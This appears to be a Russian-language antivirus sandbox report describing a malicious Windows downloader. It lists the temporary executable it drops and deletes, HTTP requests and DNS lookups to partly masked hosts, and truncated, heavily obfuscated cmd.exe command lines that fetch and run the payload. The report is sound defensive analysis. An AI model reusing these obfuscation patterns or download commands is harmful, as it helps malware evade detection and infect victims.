Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c ^for , ; /F , " tokens= 1 delims=fNXOL" ; %h ; iN , ( , ' ; f^^tyP^^e ; ^| ; f^^IndS^^tR , df^^i ' , , ) ; ; DO ; ; %h; , F^/^VpG_^7HNj , , v2FBxK7/^R " ; , ( (SE^t ^ ]-^_...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\380.exe
Удаляет следующие файлы
- %TEMP%\380.exe
Сетевая активность
Подключается к
- 'yu###hua.com':80
- 'co##unic.at':80
TCP
Запросы HTTP GET
- http://www.yu###hua.com/sM03OXw
- http://www.co##unic.at/f0rk3
UDP
- DNS ASK yu###hua.com
- DNS ASK mu#####diyahamin.com
- DNS ASK ov#######oorsandlocksmith.com
- DNS ASK co##unic.at
- DNS ASK so###scape.id
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ^for , ; /F , " tokens= 1 delims=fNXOL" ; %h ; iN , ( , ' ; f^^tyP^^e ; ^| ; f^^IndS^^tR , df^^i ' , , ) ; ; DO ; ; %h; , F^/^VpG_^7HNj , , v2FBxK7/^R " ; , ( (SE^t ^ ]-^_...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c f^tyP^e | f^IndS^tR df^i
- '<SYSTEM32>\cmd.exe' /S /D /c" ftyPe "
- '<SYSTEM32>\findstr.exe' dfi
- '<SYSTEM32>\cmd.exe' ; , F/VpG_7HNj , , v2FBxK7/R " ; , ( (SE^t ^ ]-^_=,t^(NE^Prk^:muih@qf 93F8X^C'=v^)/dO-$J\0^WTS+Z^y5jMx^.^sp1;eoalD^{^}B2bnwc) , ; , ; , )& ; , FOr , ; %^L , ^In ; ; ( 47 ^ , ...
